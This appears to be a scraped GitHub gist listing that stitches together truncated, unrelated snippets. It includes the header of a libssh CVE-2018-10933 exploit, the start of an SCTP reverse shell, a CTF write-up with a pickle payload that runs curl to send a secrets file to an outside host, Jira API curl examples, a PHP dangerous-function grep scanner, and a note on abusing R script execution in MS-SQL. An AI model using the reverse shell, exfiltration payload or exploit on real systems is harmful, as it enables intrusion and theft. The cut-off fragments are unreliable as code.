#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
@ricardojba
ricardojba / sctp_reverse_shell.py
Created December 3, 2018 17:29 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
-- challenge 1:
From the name of the challenge it was a dead giveaway that there was a .git folder exposed.
Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config
And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally check all the commits and on this one at the bottom of the page you can read a flag:
cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}
@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:47 — forked from TheMightyLlama/jira-curl.sh
Perform actions on a jira issue via curl
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions (read-only call, so GET with the header set via -H rather than PUT with a body)
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions
#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" "http://localhost:8080/jira/rest/api/2/search?jql=project=\"AN\"+AND+fixVersion='12345'"
#Returns all information on an issue (read-only call, so GET with the header set via -H rather than PUT with a body)
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345
#Adds a comment to an existing issue
curl -D- -u uname:pass -X PUT -d "{\"update\": {\"comment\": [{\"add\": {\"body\": \"Comment added when resolving issue\"}}]}}" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345
#Transitions an issue
@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:48 — forked from elifarley/jira-curl.sh
How to use curl and here-documents to post a JSON document to create an issue in Jira in a more readable way
JIRA_REST_URL="${JIRA_REST_URL:-https://MYCOMPANY.jira.com/rest/api/2}"
JIRA_CREDENTIALS="${JIRA_CREDENTIALS:-user:password}"
# https://developer.atlassian.com/jiradev/api-reference/jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-discovering-meta-data-for-creating-issues
# https://MYCOMPANY.jira.com/rest/api/2/issue/createmeta?projectKeys=MYPROJ&issuetypeNames=MyIssueType&expand=projects.issuetypes.fields
# customfield_10171: My Custom Field Name 1
# customfield_10172: My Custom Field Name 2
# This method creates a new issue of type 'MyIssueType' in project 'MYPROJ' with 2 custom fields
@ricardojba
ricardojba / php-egrep-sast-scan.sh
Created September 3, 2019 10:51 — forked from mgeeky/php-egrep-sast-scan.sh
egrep expression to scan PHP sources for invocation of potentially dangerous functions.
#!/bin/bash
P="*"
if [ -n "$1" ]; then
P="$1"
fi
grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s
@ricardojba
ricardojba / gist:ab090df0b0c294f09940213e526e728f
Created March 22, 2020 15:02
Executing R Scripts in MSSQL
# original https://pastebin.com/zBDnzELT
Starting with MS-SQL 2016, MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this functionality to be enabled, the R services for SQL Server component must be installed, the server must be reconfigured to permit sp_execute_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common.
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script().
This can be 'fun'...
Sample R query in MS-SQL (from MSDN):